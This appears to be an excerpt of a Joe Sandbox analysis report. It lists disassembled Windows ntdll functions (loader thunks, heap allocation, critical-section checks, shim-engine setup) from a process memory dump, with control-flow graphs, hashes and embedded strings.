                                                                                                                                Executed Functions

                                                                                                                                Function 357F2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1 357f2d10-357f2d1c LdrInitializeThunk
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: d2ce2e313afd8dae85a0209a22e48c6c44c3fcc10bbaf966649ff804458c3bf7
                                                                                                                                • Instruction ID: ddd468cdc3de5fa017f1ae5ca3b12a7c30c80db0136547f149ab92d44ecdb61b
                                                                                                                                • Opcode Fuzzy Hash: d2ce2e313afd8dae85a0209a22e48c6c44c3fcc10bbaf966649ff804458c3bf7
                                                                                                                                • Instruction Fuzzy Hash: 2890023120140423D51161584A05707001947D0341FD1CC57A0414618DD6668D9AB921
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357F34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 2 357f34e0-357f34ec LdrInitializeThunk
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: bc760386493fe4d90822d767c76c8a544146cb075daadab2d38c7e5dbf6d1e4c
                                                                                                                                • Instruction ID: 36f39bff1ee460d400150702a5158a1f9bebae38a199188a22923660ee4e60ac
                                                                                                                                • Opcode Fuzzy Hash: bc760386493fe4d90822d767c76c8a544146cb075daadab2d38c7e5dbf6d1e4c
                                                                                                                                • Instruction Fuzzy Hash: AE90023160550412D50061584A15706101547D0301FA1CC56A0414628DC7A58D997DA2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357F2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 0 357f2b90-357f2b9c LdrInitializeThunk
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 822c157306e944543faa64cbf9194f2eedc54c8285cc5c284c3d3f2954c22ab6
                                                                                                                                • Instruction ID: 7b3fc0dd7ac001ce0cd5db26e3e90282cf60e0b37cb35db50079fbb2c4f222e6
                                                                                                                                • Opcode Fuzzy Hash: 822c157306e944543faa64cbf9194f2eedc54c8285cc5c284c3d3f2954c22ab6
                                                                                                                                • Instruction Fuzzy Hash: D390023120148812D5106158890574A001547D0301F95CC56A4414718DC6A58CD97921
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Non-executed Functions

                                                                                                                                Function 35859060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 3 35859060-358590a9 4 358590f8-35859107 3->4 5 358590ab-358590b0 3->5 6 358590b4-358590ba 4->6 7 35859109-3585910e 4->7 5->6 8 35859215-3585923d call 357f8f40 6->8 9 358590c0-358590e4 call 357f8f40 6->9 10 35859893-358598a7 call 357f4b50 7->10 19 3585925c-35859292 8->19 20 3585923f-3585925a call 358598aa 8->20 17 358590e6-358590f3 call 358792ab 9->17 18 35859113-358591b4 GetPEB call 3585d7e5 9->18 31 358591fd-35859210 RtlDebugPrintTimes 17->31 29 358591b6-358591c4 18->29 30 358591d2-358591e7 18->30 21 35859294-35859296 19->21 20->21 21->10 25 3585929c-358592b1 RtlDebugPrintTimes 21->25 25->10 37 358592b7-358592be 25->37 29->30 32 358591c6-358591cb 29->32 30->31 33 358591e9-358591ee 30->33 31->10 32->30 35 358591f0 33->35 36 358591f3-358591f6 33->36 35->36 36->31 37->10 39 358592c4-358592df 37->39 40 358592e3-358592f4 call 3585a388 39->40 43 35859891 40->43 44 358592fa-358592fc 40->44 43->10 44->10 45 35859302-35859309 44->45 46 3585947c-35859482 45->46 47 3585930f-35859314 45->47 48 3585961c-35859622 46->48 49 35859488-358594b7 call 357f8f40 46->49 50 35859316-3585931c 47->50 51 3585933c 47->51 54 35859674-35859679 48->54 55 35859624-3585962d 48->55 65 358594f0-35859505 49->65 66 358594b9-358594c4 49->66 50->51 56 3585931e-35859332 50->56 52 35859340-35859391 call 357f8f40 RtlDebugPrintTimes 51->52 52->10 92 35859397-3585939b 52->92 60 3585967f-35859687 54->60 61 35859728-35859731 54->61 55->40 59 35859633-3585966f call 357f8f40 55->59 62 35859334-35859336 56->62 63 35859338-3585933a 56->63 86 35859869 59->86 69 35859693-358596bd call 35858093 60->69 70 35859689-3585968d 60->70 61->40 67 35859737-3585973a 61->67 62->52 63->52 76 35859507-35859509 65->76 77 35859511-35859518 65->77 71 358594c6-358594cd 66->71 72 358594cf-358594ee 66->72 73 35859740-3585978a 67->73 74 358597fd-35859834 call 357f8f40 67->74 89 358596c3-3585971e call 357f8f40 RtlDebugPrintTimes 69->89 90 35859888-3585988c 69->90 70->61 70->69 71->72 85 35859559-35859576 RtlDebugPrintTimes 72->85 83 35859791-3585979e 73->83 84 3585978c 73->84 101 35859836 74->101 102 3585983b-35859842 74->102 87 3585950f 76->87 88 3585950b-3585950d 76->88 79 3585953d-3585953f 77->79 93 35859541-35859557 79->93 94 3585951a-35859524 79->94 95 358597a0-358597a3 83->95 96 358597aa-358597ad 83->96 84->83 85->10 117 3585957c-3585959f call 357f8f40 85->117 97 3585986d 86->97 87->77 88->77 89->10 135 35859724 89->135 90->40 103 3585939d-358593a5 92->103 104 358593eb-35859400 92->104 93->85 98 35859526 94->98 99 3585952d 94->99 95->96 107 358597af-358597b2 96->107 108 358597b9-358597fb 96->108 106 35859871-35859886 RtlDebugPrintTimes 97->106 98->93 109 35859528-3585952b 98->109 111 3585952f-35859531 99->111 101->102 112 35859844-3585984b 102->112 113 3585984d 102->113 114 358593a7-358593d0 call 35858093 103->114 115 358593d2-358593e9 103->115 116 35859406-35859414 104->116 106->10 106->90 107->108 108->106 109->111 118 35859533-35859535 111->118 119 3585953b 111->119 120 35859851-35859857 112->120 113->120 122 35859418-3585946f call 357f8f40 RtlDebugPrintTimes 114->122 115->116 116->122 133 358595a1-358595bb 117->133 134 358595bd-358595d8 117->134 118->119 126 35859537-35859539 118->126 119->79 127 3585985e-35859864 120->127 128 35859859-3585985c 120->128 122->10 139 35859475-35859477 122->139 126->79 127->97 136 35859866 127->136 128->86 137 358595dd-3585960b RtlDebugPrintTimes 133->137 134->137 135->61 136->86 137->10 141 35859611-35859617 137->141 139->90 141->67
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: $ $0
                                                                                                                                • API String ID: 3446177414-3352262554
                                                                                                                                • Opcode ID: a26357e56e3c9efb1fb81a3cef3783badc1e92fa19aef0b1efc7c9e2427febc2
                                                                                                                                • Instruction ID: 6939234749e0446a77f8b9cdedbe47cc1f21a3149e6b662dd52f235625ea13fe
                                                                                                                                • Opcode Fuzzy Hash: a26357e56e3c9efb1fb81a3cef3783badc1e92fa19aef0b1efc7c9e2427febc2
                                                                                                                                • Instruction Fuzzy Hash: 9D3211B16083818FE350CF68C884B9BBBF5BB88354F044D2EF59987250D7B5E94ACB52
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357E8540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 142 357e8540-357e85a1 143 358250a2-358250a8 142->143 144 357e85a7-357e85b8 142->144 143->144 145 358250ae-358250bb GetPEB 143->145 145->144 146 358250c1-358250c4 145->146 147 358250e1-35825107 call 357f2c00 146->147 148 358250c6-358250d0 146->148 147->144 153 3582510d-35825111 147->153 148->144 149 358250d6-358250df 148->149 151 35825138-3582514c call 357b53c0 149->151 157 35825152-3582515e 151->157 153->144 156 35825117-3582512c call 357f2c00 153->156 156->144 165 35825132 156->165 159 35825367-35825373 call 35825378 157->159 160 35825164-35825178 157->160 159->144 163 35825196-3582520c 160->163 164 3582517a 160->164 170 35825245-35825248 163->170 171 3582520e-35825240 call 357afcf0 163->171 167 3582517c-35825183 164->167 165->151 167->163 169 35825185-35825187 167->169 172 35825189-3582518c 169->172 173 3582518e-35825190 169->173 175 3582524e-3582529f 170->175 176 3582531f-35825322 170->176 184 35825358-3582535d call 3583a130 171->184 172->167 173->163 177 35825360-35825362 173->177 181 358252a1-358252d7 call 357afcf0 175->181 182 358252d9-3582531d call 357afcf0 * 2 175->182 176->177 178 35825324-35825353 call 357afcf0 176->178 177->157 178->184 181->184 182->184 184->177
                                                                                                                                Strings
                                                                                                                                • Invalid debug info address of this critical section, xrefs: 358252C1
                                                                                                                                • 8, xrefs: 358250EE
                                                                                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 35825215, 358252A1, 35825324
                                                                                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 358252ED
                                                                                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 358252D9
                                                                                                                                • double initialized or corrupted critical section, xrefs: 35825313
                                                                                                                                • Critical section address, xrefs: 35825230, 358252C7, 3582533F
                                                                                                                                • corrupted critical section, xrefs: 358252CD
                                                                                                                                • Address of the debug info found in the active list., xrefs: 358252B9, 35825305
                                                                                                                                • undeleted critical section in freed memory, xrefs: 35825236
                                                                                                                                • Critical section address., xrefs: 3582530D
                                                                                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 3582534E
                                                                                                                                • Critical section debug info address, xrefs: 3582522A, 35825339
                                                                                                                                • Thread identifier, xrefs: 35825345
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                • API String ID: 0-2368682639
                                                                                                                                • Opcode ID: 83cafed67e845df7fce8a9a4d3dc1a45390bc897e35ef8fbc49bae3bb2d3b5cb
                                                                                                                                • Instruction ID: d444c216d9bdf932c9a3e9da74c9d6295113ec03d8bc97f60eea6d5283e28bb2
                                                                                                                                • Opcode Fuzzy Hash: 83cafed67e845df7fce8a9a4d3dc1a45390bc897e35ef8fbc49bae3bb2d3b5cb
                                                                                                                                • Instruction Fuzzy Hash: D78177B5A41348AFEB14CF95D844BAEBBB5FB08710F214199E904BF280D771AD85CBA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 3585FDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 194 3585fdf4-3585fe16 call 35807be4 197 3585fe35-3585fe4d call 357a7662 194->197 198 3585fe18-3585fe30 RtlDebugPrintTimes 194->198 203 35860277 197->203 204 3585fe53-3585fe69 197->204 202 358602d1-358602e0 198->202 207 3586027a-358602ce call 358602e6 203->207 205 3585fe70-3585fe72 204->205 206 3585fe6b-3585fe6e 204->206 208 3585fe73-3585fe8a 205->208 206->208 207->202 210 3585fe90-3585fe93 208->210 211 35860231-3586023a GetPEB 208->211 210->211 215 3585fe99-3585fea2 210->215 213 3586023c-35860257 GetPEB call 357ab910 211->213 214 35860259-3586025e call 357ab910 211->214 222 35860263-35860274 call 357ab910 213->222 214->222 219 3585fea4-3585febb call 357bfed0 215->219 220 3585febe-3585fed1 call 35860835 215->220 219->220 228 3585fed3-3585feda 220->228 229 3585fedc-3585fef0 call 357a753f 220->229 222->203 228->229 233 3585fef6-3585ff02 GetPEB 229->233 234 35860122-35860127 229->234 235 3585ff04-3585ff07 233->235 236 3585ff70-3585ff7b 233->236 234->207 237 3586012d-35860139 GetPEB 234->237 240 3585ff26-3585ff2b call 357ab910 235->240 241 3585ff09-3585ff24 GetPEB call 357ab910 235->241 238 3585ff81-3585ff88 236->238 239 35860068-3586007a call 357c2710 236->239 242 358601a7-358601b2 237->242 243 3586013b-3586013e 237->243 238->239 244 3585ff8e-3585ff97 238->244 259 35860110-3586011d call 35860d24 call 35860835 239->259 260 35860080-35860087 239->260 257 3585ff30-3585ff51 call 357ab910 GetPEB 240->257 241->257 242->207 245 358601b8-358601c3 242->245 247 35860140-3586015b GetPEB call 357ab910 243->247 248 3586015d-35860162 call 357ab910 243->248 252 3585ff99-3585ffa9 244->252 253 3585ffb8-3585ffbc 244->253 245->207 254 358601c9-358601d4 245->254 267 35860167-3586017b call 357ab910 247->267 248->267 252->253 261 3585ffab-3585ffb5 call 3586d646 252->261 263 3585ffce-3585ffd4 253->263 264 3585ffbe-3585ffcc call 357e3ae9 253->264 254->207 262 358601da-358601e3 GetPEB 254->262 257->239 288 3585ff57-3585ff6b 257->288 259->234 269 35860092-3586009a 260->269 270 35860089-35860090 260->270 261->253 273 358601e5-35860200 GetPEB call 357ab910 262->273 274 35860202-35860207 call 357ab910 262->274 276 3585ffd7-3585ffe0 263->276 264->276 289 3586017e-35860188 GetPEB 267->289 279 3586009c-358600ac 269->279 280 358600b8-358600bc 269->280 270->269 295 3586020c-3586022c call 3585823a call 357ab910 273->295 274->295 286 3585fff2-3585fff5 276->286 287 3585ffe2-3585fff0 276->287 279->280 290 358600ae-358600b3 call 3586d646 279->290 292 358600be-358600d1 call 357e3ae9 280->292 293 358600ec-358600f2 280->293 296 3585fff7-3585fffe 286->296 297 35860065 286->297 287->286 288->239 289->207 300 3586018e-358601a2 289->300 290->280 311 358600e3 292->311 312 358600d3-358600e1 call 357dfdb9 292->312 299 358600f5-358600fc 293->299 295->289 296->297 298 35860000-3586000b 296->298 297->239 298->297 304 3586000d-35860016 GetPEB 298->304 299->259 305 358600fe-3586010e 299->305 300->207 309 35860035-3586003a call 357ab910 304->309 310 35860018-35860033 GetPEB call 357ab910 304->310 305->259 319 3586003f-3586005d call 3585823a call 357ab910 309->319 310->319 317 358600e6-358600ea 311->317 312->317 317->299 319->297
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                • API String ID: 3446177414-1700792311
                                                                                                                                • Opcode ID: 08a0984251434e5e9a45b3b3c4ce603e2a101afc6d7c2088edf9a653cf4f08ad
                                                                                                                                • Instruction ID: f3127c74fc42a3aaf09a7f6120b0fc990fcc84dff529908c12fa145d049d5601
                                                                                                                                • Opcode Fuzzy Hash: 08a0984251434e5e9a45b3b3c4ce603e2a101afc6d7c2088edf9a653cf4f08ad
                                                                                                                                • Instruction Fuzzy Hash: 01D1207A614789DFCB02CFA8D404AADBBF2FF49314F048599E545AB322CB35AD41CB14
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 358586C2 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 875 358586c2-3585873a GetPEB call 357b0670 878 35858740-3585875e call 357b42b0 875->878 879 35858892-3585889a 875->879 884 35858760-35858779 call 357f7ad0 878->884 885 3585877f-35858787 878->885 880 3585889b-358588b0 call 357f4b50 879->880 884->879 884->885 888 358587b7-358587c0 885->888 889 35858789-3585879e call 357e4f11 885->889 888->879 892 358587c6-358587c8 888->892 889->879 895 358587a4-358587ac 889->895 892->880 894 358587ce-358587dc 892->894 896 358587e8-358587ee 894->896 895->879 897 358587b2 895->897 898 358587f0 896->898 899 358587de-358587e2 896->899 897->880 900 3585884f-35858875 call 357e4e50 898->900 901 358587e4-358587e5 899->901 902 358587f2-358587f4 899->902 900->880 908 35858877-35858890 call 357f7ad0 900->908 901->896 902->900 903 358587f6-358587ff 902->903 903->900 905 35858801-35858803 903->905 907 35858807-3585881b call 357f7ad0 905->907 913 3585881d 907->913 914 35858839 907->914 908->879 908->880 915 35858820-35858829 913->915 916 3585883d-3585884d 914->916 915->915 917 3585882b-35858835 915->917 916->900 916->907 917->879 918 35858837 917->918 918->916
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                • API String ID: 0-2515994595
                                                                                                                                • Opcode ID: 16c5b7edef56674568e9ffc6ba155813d97f858bfe85611e77bac62dba57f3a7
                                                                                                                                • Instruction ID: ba1c7a4f2fc10bddb8e230fff0ba63cd9e8d840700a38f7958f3a451432c9589
                                                                                                                                • Opcode Fuzzy Hash: 16c5b7edef56674568e9ffc6ba155813d97f858bfe85611e77bac62dba57f3a7
                                                                                                                                • Instruction Fuzzy Hash: F45192B55083199BD315CF198885B9BB7E9FF84360F604D1EF95A87240E771DA04CB92
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 3585F0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1030 3585f0a5-3585f0c7 call 35807be4 1033 3585f0e3-3585f0fb call 357a7662 1030->1033 1034 3585f0c9-3585f0de RtlDebugPrintTimes 1030->1034 1039 3585f101-3585f11c 1033->1039 1040 3585f3d2 1033->1040 1038 3585f3e7-3585f3f6 1034->1038 1042 3585f125-3585f137 1039->1042 1043 3585f11e 1039->1043 1041 3585f3d5-3585f3e4 call 3585f3f9 1040->1041 1041->1038 1045 3585f13c-3585f144 1042->1045 1046 3585f139-3585f13b 1042->1046 1043->1042 1048 3585f350-3585f359 GetPEB 1045->1048 1049 3585f14a-3585f14d 1045->1049 1046->1045 1050 3585f378-3585f37d call 357ab910 1048->1050 1051 3585f35b-3585f376 GetPEB call 357ab910 1048->1051 1049->1048 1052 3585f153-3585f156 1049->1052 1059 3585f382-3585f396 call 357ab910 1050->1059 1051->1059 1055 3585f173-3585f196 call 35860835 call 357c5d90 call 35860d24 1052->1055 1056 3585f158-3585f170 call 357bfed0 1052->1056 1055->1041 1069 3585f19c-3585f1a3 1055->1069 1056->1055 1059->1040 1070 3585f1a5-3585f1ac 1069->1070 1071 3585f1ae-3585f1b6 1069->1071 1070->1071 1072 3585f1d4-3585f1d8 1071->1072 1073 3585f1b8-3585f1c8 1071->1073 1075 3585f208-3585f20e 1072->1075 1076 3585f1da-3585f1ed call 357e3ae9 1072->1076 1073->1072 1074 3585f1ca-3585f1cf call 3586d646 1073->1074 1074->1072 1077 3585f211-3585f21b 1075->1077 1083 3585f1ff 1076->1083 1084 3585f1ef-3585f1fd call 357dfdb9 1076->1084 1081 3585f21d-3585f22d 1077->1081 1082 3585f22f-3585f236 1077->1082 1081->1082 1085 3585f241-3585f250 GetPEB 1082->1085 1086 3585f238-3585f23c call 35860835 1082->1086 1088 3585f202-3585f206 1083->1088 1084->1088 1090 3585f252-3585f255 1085->1090 1091 3585f2be-3585f2c9 1085->1091 1086->1085 1088->1077 1094 3585f274-3585f279 call 357ab910 1090->1094 1095 3585f257-3585f272 GetPEB call 357ab910 1090->1095 1091->1041 1093 3585f2cf-3585f2d5 1091->1093 1093->1041 1097 3585f2db-3585f2e2 1093->1097 1100 3585f27e-3585f292 call 357ab910 1094->1100 1095->1100 1097->1041 1101 3585f2e8-3585f2f3 1097->1101 1108 3585f295-3585f29f GetPEB 1100->1108 1101->1041 1103 3585f2f9-3585f302 GetPEB 1101->1103 1105 3585f304-3585f31f GetPEB call 357ab910 1103->1105 1106 3585f321-3585f326 call 357ab910 1103->1106 1110 3585f32b-3585f34b call 3585823a call 357ab910 1105->1110 1106->1110 1108->1041 1111 3585f2a5-3585f2b9 1108->1111 1110->1108 1111->1041
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                • API String ID: 3446177414-1745908468
                                                                                                                                • Opcode ID: cc7079a75ab6e7db9784ce26b65cc32062c7a374e98c967af8d4ef27872238d6
                                                                                                                                • Instruction ID: bdaf4fba679a557ff2bd9970fcb82d90924efe7cd907af831f5a4e5f14beace5
                                                                                                                                • Opcode Fuzzy Hash: cc7079a75ab6e7db9784ce26b65cc32062c7a374e98c967af8d4ef27872238d6
                                                                                                                                • Instruction Fuzzy Hash: DD911FBAA04748DFEB02CFA8D444ADDBBF2FF49360F448899E545AB251CB75AD41CB10
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357A640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlDebugPrintTimes.NTDLL ref: 357A651C
                                                                                                                                  • Part of subcall function 357A6565: RtlDebugPrintTimes.NTDLL ref: 357A6614
                                                                                                                                  • Part of subcall function 357A6565: RtlDebugPrintTimes.NTDLL ref: 357A665F
                                                                                                                                Strings
                                                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3580977C
                                                                                                                                • LdrpInitShimEngine, xrefs: 35809783, 35809796, 358097BF
                                                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 358097B9
                                                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 35809790
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 358097A0, 358097C9
                                                                                                                                • apphelp.dll, xrefs: 357A6446
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 3446177414-204845295
                                                                                                                                • Opcode ID: a0a2da658322a18a05196f46ebef7f444bc508232942e25d5cba604444d97429
                                                                                                                                • Instruction ID: 021d5d489f0eee2c5fe529448c3259a19cff85243b138c53574eea092446a5fc
                                                                                                                                • Opcode Fuzzy Hash: a0a2da658322a18a05196f46ebef7f444bc508232942e25d5cba604444d97429
                                                                                                                                • Instruction Fuzzy Hash: 7251AC72608304AFE325DF24DC85BAAB7F9EB84744F400A19F9959B250EB30ED05CB92
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357AD02D Relevance: 11.5, Strings: 9, Instructions: 249COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 357AD06F
                                                                                                                                • h.}5, xrefs: 3580A5D2
                                                                                                                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 357AD0E6
                                                                                                                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 357AD136
                                                                                                                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 357AD202
                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 357AD263
                                                                                                                                • @, xrefs: 357AD24F
                                                                                                                                • @, xrefs: 357AD2B3
                                                                                                                                • @, xrefs: 357AD09D
